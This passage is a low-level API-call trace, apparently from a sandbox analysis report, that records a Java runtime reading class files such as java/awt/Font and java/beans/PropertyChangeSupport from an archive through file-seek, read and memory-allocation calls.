liDistanceToMove=0x3413d53, lpNewFilePointer=0x208bd70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd70*=54607187) returned 1 [0130.433] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bd40, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208bd40*=0xa0, lpOverlapped=0x0) returned 1 [0130.434] malloc (_Size=0x23) returned 0x12ddb190 [0130.434] strlen (_Str="java/awt/Font$FontAccessImpl.class") returned 0x22 [0130.434] strcpy (in: _Dest=0x208bef0, _Source="java/awt/Font$FontAccessImpl.class" | out: _Dest="java/awt/Font$FontAccessImpl.class") returned="java/awt/Font$FontAccessImpl.class" [0130.434] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x300b4be, lpNewFilePointer=0x208b970, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b970*=50377918) returned 1 [0130.434] ReadFile (in: hFile=0x134, lpBuffer=0x208b9c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b940, lpOverlapped=0x0 | out: lpBuffer=0x208b9c0*, lpNumberOfBytesRead=0x208b940*=0x1e, lpOverlapped=0x0) returned 1 [0130.435] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x300b4fe, lpNewFilePointer=0x208b9d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9d0*=50377982) returned 1 [0130.435] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x315, lpNumberOfBytesRead=0x208b9a0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208b9a0*=0x315, lpOverlapped=0x0) returned 1 [0130.435] free (_Block=0x12f4ea20) [0130.435] free (_Block=0x12e5f830) [0130.438] strlen (_Str="sun/font/FontAccess.class") returned 0x19 [0130.438] malloc (_Size=0x48) returned 0x12e5f8d0 [0130.438] malloc (_Size=0xa0) returned 0x12daaef0 [0130.438] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413d0c, lpNewFilePointer=0x208b330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b330*=54607116) returned 1 [0130.438] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b300, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208b300*=0xa0, lpOverlapped=0x0) returned 1 [0130.439] malloc (_Size=0x1a) returned 0x12dda860 [0130.440] strlen (_Str="sun/font/FontAccess.class") returned 0x19 [0130.440] strcpy (in: _Dest=0x208b4b0, _Source="sun/font/FontAccess.class" | out: _Dest="sun/font/FontAccess.class") returned="sun/font/FontAccess.class" [0130.472] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x300b1d9, lpNewFilePointer=0x208af30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208af30*=50377177) returned 1 [0130.472] ReadFile (in: hFile=0x134, lpBuffer=0x208af80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208af00, lpOverlapped=0x0 | out: lpBuffer=0x208af80*, lpNumberOfBytesRead=0x208af00*=0x1e, lpOverlapped=0x0) returned 1 [0130.473] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x300b210, lpNewFilePointer=0x208af90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208af90*=50377232) returned 1 [0130.473] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b4d0, nNumberOfBytesToRead=0x2ae, lpNumberOfBytesRead=0x208af60, lpOverlapped=0x0 | out: lpBuffer=0x12e4b4d0*, lpNumberOfBytesRead=0x208af60*=0x2ae, lpOverlapped=0x0) returned 1 [0130.473] free (_Block=0x12ddb190) [0130.473] free (_Block=0x12e5fd80) [0130.483] strlen (_Str="java/awt/geom/AffineTransform.class") returned 0x23 [0130.483] malloc (_Size=0x48) returned 0x12e600f0 [0130.483] malloc (_Size=0xa0) returned 0x12dabe10 [0130.483] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413cbb, lpNewFilePointer=0x208bd70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd70*=54607035) returned 1 [0130.483] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bd40, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208bd40*=0xa0, lpOverlapped=0x0) returned 1 [0130.484] malloc (_Size=0x24) returned 0x12ddac20 [0130.484] strlen (_Str="java/awt/geom/AffineTransform.class") returned 0x23 [0130.484] strcpy (in: _Dest=0x208bef0, _Source="java/awt/geom/AffineTransform.class" | out: _Dest="java/awt/geom/AffineTransform.class") returned="java/awt/geom/AffineTransform.class" [0130.485] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x300568d, lpNewFilePointer=0x208b970, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b970*=50353805) returned 1 [0130.485] ReadFile (in: hFile=0x134, lpBuffer=0x208b9c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b940, lpOverlapped=0x0 | out: lpBuffer=0x208b9c0*, lpNumberOfBytesRead=0x208b940*=0x1e, lpOverlapped=0x0) returned 1 [0130.487] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30056ce, lpNewFilePointer=0x208b9d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9d0*=50353870) returned 1 [0130.487] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x5b0b, lpNumberOfBytesRead=0x208b9a0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208b9a0*=0x5b0b, lpOverlapped=0x0) returned 1 [0130.489] free (_Block=0x12dda860) [0130.489] free (_Block=0x12e5f8d0) [0130.500] malloc (_Size=0x48) returned 0x12e5f790 [0130.500] malloc (_Size=0xa0) returned 0x12dac650 [0130.500] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413c6f, lpNewFilePointer=0x208bc30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc30*=54606959) returned 1 [0130.500] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bc00, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208bc00*=0xa0, lpOverlapped=0x0) returned 1 [0130.501] malloc (_Size=0x1f) returned 0x12ddaa70 [0130.502] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3000d91, lpNewFilePointer=0x208b830, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b830*=50335121) returned 1 [0130.502] ReadFile (in: hFile=0x134, lpBuffer=0x208b880, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b800, lpOverlapped=0x0 | out: lpBuffer=0x208b880*, lpNumberOfBytesRead=0x208b800*=0x1e, lpOverlapped=0x0) returned 1 [0130.504] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3000dcd, lpNewFilePointer=0x208b890, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b890*=50335181) returned 1 [0130.504] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x48c0, lpNumberOfBytesRead=0x208b860, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208b860*=0x48c0, lpOverlapped=0x0) returned 1 [0130.506] malloc (_Size=0x48) returned 0x12e5f830 [0130.506] malloc (_Size=0xa0) returned 0x12dab890 [0130.506] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413c28, lpNewFilePointer=0x208b450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b450*=54606888) returned 1 [0130.506] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b420, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208b420*=0xa0, lpOverlapped=0x0) returned 1 [0130.507] malloc (_Size=0x1a) returned 0x12ddad70 [0130.507] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ffffcc, lpNewFilePointer=0x208b050, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b050*=50331596) returned 1 [0130.507] ReadFile (in: hFile=0x134, lpBuffer=0x208b0a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b020, lpOverlapped=0x0 | out: lpBuffer=0x208b0a0*, lpNumberOfBytesRead=0x208b020*=0x1e, lpOverlapped=0x0) returned 1 [0130.508] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3000003, lpNewFilePointer=0x208b0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b0b0*=50331651) returned 1 [0130.508] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0xd8e, lpNumberOfBytesRead=0x208b080, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208b080*=0xd8e, lpOverlapped=0x0) returned 1 [0130.513] strlen (_Str="java/text/AttributedCharacterIterator$Attribute.class") returned 0x35 [0130.513] malloc (_Size=0x48) returned 0x12e5f0b0 [0130.513] malloc (_Size=0xa0) returned 0x12daace0 [0130.513] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413bc5, lpNewFilePointer=0x208b5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5b0*=54606789) returned 1 [0130.513] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b580, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208b580*=0xa0, lpOverlapped=0x0) returned 1 [0130.514] malloc (_Size=0x36) returned 0x12ed5bb0 [0130.514] strlen (_Str="java/text/AttributedCharacterIterator$Attribute.class") returned 0x35 [0130.514] strcpy (in: _Dest=0x208b730, _Source="java/text/AttributedCharacterIterator$Attribute.class" | out: _Dest="java/text/AttributedCharacterIterator$Attribute.class") returned="java/text/AttributedCharacterIterator$Attribute.class" [0130.514] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fff816, lpNewFilePointer=0x208b1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b1b0*=50329622) returned 1 [0130.514] ReadFile (in: hFile=0x134, lpBuffer=0x208b200, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b180, lpOverlapped=0x0 | out: lpBuffer=0x208b200*, lpNumberOfBytesRead=0x208b180*=0x1e, lpOverlapped=0x0) returned 1 [0130.515] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fff869, lpNewFilePointer=0x208b210, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b210*=50329705) returned 1 [0130.515] ReadFile (in: hFile=0x134, lpBuffer=0x12317730, nNumberOfBytesToRead=0x763, lpNumberOfBytesRead=0x208b1e0, lpOverlapped=0x0 | out: lpBuffer=0x12317730*, lpNumberOfBytesRead=0x208b1e0*=0x763, lpOverlapped=0x0) returned 1 [0130.515] free (_Block=0x12ddad70) [0130.516] free (_Block=0x12e5f830) [0130.520] strlen (_Str="java/awt/font/TextAttribute.class") returned 0x21 [0130.520] malloc (_Size=0x48) returned 0x12e5ede0 [0130.520] malloc (_Size=0xa0) returned 0x12dab520 [0130.520] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413a7d, lpNewFilePointer=0x208a760, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a760*=54606461) returned 1 [0130.520] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a730, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208a730*=0xa0, lpOverlapped=0x0) returned 1 [0130.520] malloc (_Size=0x22) returned 0x12ddb190 [0130.521] strlen (_Str="java/awt/font/TextAttribute.class") returned 0x21 [0130.521] strcpy (in: _Dest=0x208a8e0, _Source="java/awt/font/TextAttribute.class" | out: _Dest="java/awt/font/TextAttribute.class") returned="java/awt/font/TextAttribute.class" [0130.521] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ffd9f5, lpNewFilePointer=0x208a360, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a360*=50321909) returned 1 [0130.521] ReadFile (in: hFile=0x134, lpBuffer=0x208a3b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a330, lpOverlapped=0x0 | out: lpBuffer=0x208a3b0*, lpNumberOfBytesRead=0x208a330*=0x1e, lpOverlapped=0x0) returned 1 [0130.522] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ffda34, lpNewFilePointer=0x208a3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a3c0*=50321972) returned 1 [0130.522] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x1194, lpNumberOfBytesRead=0x208a390, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208a390*=0x1194, lpOverlapped=0x0) returned 1 [0130.523] free (_Block=0x12ed5bb0) [0130.523] free (_Block=0x12e5f0b0) [0130.556] strlen (_Str="java/awt/Component$1.class") returned 0x1a [0130.556] malloc (_Size=0x48) returned 0x12e5f510 [0130.556] malloc (_Size=0xa0) returned 0x12daace0 [0130.556] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413a35, lpNewFilePointer=0x208caa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208caa0*=54606389) returned 1 [0130.556] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca70, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208ca70*=0xa0, lpOverlapped=0x0) returned 1 [0130.556] malloc (_Size=0x1b) returned 0x12ddaf20 [0130.557] strlen (_Str="java/awt/Component$1.class") returned 0x1a [0130.557] strcpy (in: _Dest=0x208cc20, _Source="java/awt/Component$1.class" | out: _Dest="java/awt/Component$1.class") returned="java/awt/Component$1.class" [0130.557] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ffc803, lpNewFilePointer=0x208c6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6a0*=50317315) returned 1 [0130.557] ReadFile (in: hFile=0x134, lpBuffer=0x208c6f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c670, lpOverlapped=0x0 | out: lpBuffer=0x208c6f0*, lpNumberOfBytesRead=0x208c670*=0x1e, lpOverlapped=0x0) returned 1 [0130.558] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ffc83b, lpNewFilePointer=0x208c700, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c700*=50317371) returned 1 [0130.558] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x11ba, lpNumberOfBytesRead=0x208c6d0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208c6d0*=0x11ba, lpOverlapped=0x0) returned 1 [0130.558] free (_Block=0x12ddb190) [0130.559] free (_Block=0x12e5ede0) [0130.560] strlen (_Str="sun/awt/AWTAccessor$ComponentAccessor.class") returned 0x2b [0130.560] malloc (_Size=0x48) returned 0x12e5ff10 [0130.560] malloc (_Size=0xa0) returned 0x12dabd60 [0130.560] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34139dc, lpNewFilePointer=0x208bfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfe0*=54606300) returned 1 [0130.560] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bfb0, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208bfb0*=0xa0, lpOverlapped=0x0) returned 1 [0130.560] malloc (_Size=0x2c) returned 0x12ed5bb0 [0130.561] strlen (_Str="sun/awt/AWTAccessor$ComponentAccessor.class") returned 0x2b [0130.561] strcpy (in: _Dest=0x208c160, _Source="sun/awt/AWTAccessor$ComponentAccessor.class" | out: _Dest="sun/awt/AWTAccessor$ComponentAccessor.class") returned="sun/awt/AWTAccessor$ComponentAccessor.class" [0130.561] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ffbfc2, lpNewFilePointer=0x208bbe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbe0*=50315202) returned 1 [0130.561] ReadFile (in: hFile=0x134, lpBuffer=0x208bc30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bbb0, lpOverlapped=0x0 | out: lpBuffer=0x208bc30*, lpNumberOfBytesRead=0x208bbb0*=0x1e, lpOverlapped=0x0) returned 1 [0130.561] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ffc00b, lpNewFilePointer=0x208bc40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc40*=50315275) returned 1 [0130.561] ReadFile (in: hFile=0x134, lpBuffer=0x12e4c3a0, nNumberOfBytesToRead=0x7f8, lpNumberOfBytesRead=0x208bc10, lpOverlapped=0x0 | out: lpBuffer=0x12e4c3a0*, lpNumberOfBytesRead=0x208bc10*=0x7f8, lpOverlapped=0x0) returned 1 [0130.562] free (_Block=0x12ddaf20) [0130.562] free (_Block=0x12e5f510) [0130.577] malloc (_Size=0x48) returned 0x12e5ffb0 [0130.577] malloc (_Size=0xa0) returned 0x12dac390 [0130.577] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341397a, lpNewFilePointer=0x208caa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208caa0*=54606202) returned 1 [0130.578] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca70, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208ca70*=0xa0, lpOverlapped=0x0) returned 1 [0130.578] malloc (_Size=0x35) returned 0x12ef4cd0 [0130.578] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ffbd1f, lpNewFilePointer=0x208c6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6a0*=50314527) returned 1 [0130.578] ReadFile (in: hFile=0x134, lpBuffer=0x208c6f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c670, lpOverlapped=0x0 | out: lpBuffer=0x208c6f0*, lpNumberOfBytesRead=0x208c670*=0x1e, lpOverlapped=0x0) returned 1 [0130.578] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ffbd71, lpNewFilePointer=0x208c700, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c700*=50314609) returned 1 [0130.578] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x251, lpNumberOfBytesRead=0x208c6d0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208c6d0*=0x251, lpOverlapped=0x0) returned 1 [0130.579] malloc (_Size=0x48) returned 0x12e5ff60 [0130.579] malloc (_Size=0xa0) returned 0x12dac390 [0130.579] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413928, lpNewFilePointer=0x208bfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfe0*=54606120) returned 1 [0130.579] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bfb0, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208bfb0*=0xa0, lpOverlapped=0x0) returned 1 [0130.579] malloc (_Size=0x25) returned 0x12dda860 [0130.579] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ffbbb5, lpNewFilePointer=0x208bbe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbe0*=50314165) returned 1 [0130.579] ReadFile (in: hFile=0x134, lpBuffer=0x208bc30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bbb0, lpOverlapped=0x0 | out: lpBuffer=0x208bc30*, lpNumberOfBytesRead=0x208bbb0*=0x1e, lpOverlapped=0x0) returned 1 [0130.579] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ffbbf7, lpNewFilePointer=0x208bc40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc40*=50314231) returned 1 [0130.579] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b420, nNumberOfBytesToRead=0x128, lpNumberOfBytesRead=0x208bc10, lpOverlapped=0x0 | out: lpBuffer=0x12e4b420*, lpNumberOfBytesRead=0x208bc10*=0x128, lpOverlapped=0x0) returned 1 [0130.580] malloc (_Size=0x48) returned 0x12e5f970 [0130.580] malloc (_Size=0xa0) returned 0x12dac390 [0130.580] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410b5a, lpNewFilePointer=0x208d1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1f0*=54594394) returned 1 [0130.581] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d1c0, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208d1c0*=0xa0, lpOverlapped=0x0) returned 1 [0130.581] malloc (_Size=0x21) returned 0x12ddb070 [0131.438] strcpy (in: _Dest=0x208d370, _Source="sun/awt/windows/WToolkit$2.class" | out: _Dest="sun/awt/windows/WToolkit$2.class") returned="sun/awt/windows/WToolkit$2.class" [0131.438] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f92294, lpNewFilePointer=0x208cdf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdf0*=49881748) returned 1 [0131.438] ReadFile (in: hFile=0x134, lpBuffer=0x208ce40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cdc0, lpOverlapped=0x0 | out: lpBuffer=0x208ce40*, lpNumberOfBytesRead=0x208cdc0*=0x1e, lpOverlapped=0x0) returned 1 [0131.439] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f922d2, lpNewFilePointer=0x208ce50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce50*=49881810) returned 1 [0131.439] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x2de, lpNumberOfBytesRead=0x208ce20, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208ce20*=0x2de, lpOverlapped=0x0) returned 1 [0131.449] malloc (_Size=0x48) returned 0x12e60000 [0131.449] malloc (_Size=0xa0) returned 0x12daace0 [0131.449] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34105c5, lpNewFilePointer=0x208d020, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d020*=54592965) returned 1 [0131.449] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cff0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208cff0*=0xa0, lpOverlapped=0x0) returned 1 [0131.450] malloc (_Size=0x34) returned 0x12ef4cd0 [0131.450] strlen (_Str="java/awt/Toolkit$DesktopPropertyChangeSupport.class") returned 0x33 [0131.450] strcpy (in: _Dest=0x208d1a0, _Source="java/awt/Toolkit$DesktopPropertyChangeSupport.class" | out: _Dest="java/awt/Toolkit$DesktopPropertyChangeSupport.class") returned="java/awt/Toolkit$DesktopPropertyChangeSupport.class" [0131.450] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f876e0, lpNewFilePointer=0x208cc20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc20*=49837792) returned 1 [0131.450] ReadFile (in: hFile=0x134, lpBuffer=0x208cc70, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cbf0, lpOverlapped=0x0 | out: lpBuffer=0x208cc70*, lpNumberOfBytesRead=0x208cbf0*=0x1e, lpOverlapped=0x0) returned 1 [0131.451] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f87731, lpNewFilePointer=0x208cc80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc80*=49837873) returned 1 [0131.451] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0xadf, lpNumberOfBytesRead=0x208cc50, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208cc50*=0xadf, lpOverlapped=0x0) returned 1 [0131.452] free (_Block=0x12ddb070) [0131.452] free (_Block=0x12e5f970) [0131.456] strlen (_Str="java/beans/PropertyChangeSupport.class") returned 0x26 [0131.456] malloc (_Size=0x48) returned 0x12e5fd80 [0131.456] malloc (_Size=0xa0) returned 0x12dac7b0 [0131.456] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410571, lpNewFilePointer=0x208c5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c5e0*=54592881) returned 1 [0131.456] ReadFile (in: hFile=0x134, lpBuffer=0x12dac7b0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c5b0, lpOverlapped=0x0 | out: lpBuffer=0x12dac7b0*, lpNumberOfBytesRead=0x208c5b0*=0xa0, lpOverlapped=0x0) returned 1 [0131.456] malloc (_Size=0x27) returned 0x12dda740 [0131.457] strlen (_Str="java/beans/PropertyChangeSupport.class") returned 0x26 [0131.457] strcpy (in: _Dest=0x208c760, _Source="java/beans/PropertyChangeSupport.class" | out: _Dest="java/beans/PropertyChangeSupport.class") returned="java/beans/PropertyChangeSupport.class" [0131.457] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f85f8c, lpNewFilePointer=0x208c1e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1e0*=49831820) returned 1 [0131.457] ReadFile (in: hFile=0x134, lpBuffer=0x208c230, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c1b0, lpOverlapped=0x0 | out: lpBuffer=0x208c230*, lpNumberOfBytesRead=0x208c1b0*=0x1e, lpOverlapped=0x0) returned 1 [0131.458] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f85fd0, lpNewFilePointer=0x208c240, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c240*=49831888) returned 1 [0131.458] ReadFile (in: hFile=0x134, lpBuffer=0x12e4bcc0, nNumberOfBytesToRead=0x1710, lpNumberOfBytesRead=0x208c210, lpOverlapped=0x0 | out: lpBuffer=0x12e4bcc0*, lpNumberOfBytesRead=0x208c210*=0x1710, lpOverlapped=0x0) returned 1 [0131.459] free (_Block=0x12ef4cd0) [0131.460] free (_Block=0x12e60000) [0131.473] strlen (_Str="java/beans/PropertyChangeSupport$PropertyChangeListenerMap.class") returned 0x40 [0131.473] malloc (_Size=0x48) returned 0x12e5f060 [0131.473] malloc (_Size=0xa0) returned 0x12dabc00 [0131.473] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410503, lpNewFilePointer=0x208cf50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf50*=54592771) returned 1 [0131.473] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cf20, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208cf20*=0xa0, lpOverlapped=0x0) returned 1 [0131.473] malloc (_Size=0x41) returned 0x12e5f830 [0131.473] strlen (_Str="java/beans/PropertyChangeSupport$PropertyChangeListenerMap.class") returned 0x40 [0131.473] strcpy (in: _Dest=0x208d0d0, _Source="java/beans/PropertyChangeSupport$PropertyChangeListenerMap.class" | out: _Dest="java/beans/PropertyChangeSupport$PropertyChangeListenerMap.class") returned="java/beans/PropertyChangeSupport$PropertyChangeListenerMap.class" [0131.474] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f85940, lpNewFilePointer=0x208cb50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb50*=49830208) returned 1 [0131.474] ReadFile (in: hFile=0x134, lpBuffer=0x208cba0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cb20, lpOverlapped=0x0 | out: lpBuffer=0x208cba0*, lpNumberOfBytesRead=0x208cb20*=0x1e, lpOverlapped=0x0) returned 1 [0131.474] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f8599e, lpNewFilePointer=0x208cbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cbb0*=49830302) returned 1 [0131.474] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x5ee, lpNumberOfBytesRead=0x208cb80, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208cb80*=0x5ee, lpOverlapped=0x0) returned 1 [0131.474] free (_Block=0x12dda740) [0131.474] free (_Block=0x12e5fd80) [0131.477] strlen (_Str="java/beans/ChangeListenerMap.class") returned 0x22 [0131.477] malloc (_Size=0x48) returned 0x12e5f880 [0131.477] malloc (_Size=0xa0) returned 0x12dac860 [0131.477] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34104b3, lpNewFilePointer=0x208c510, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c510*=54592691) returned 1 [0131.477] 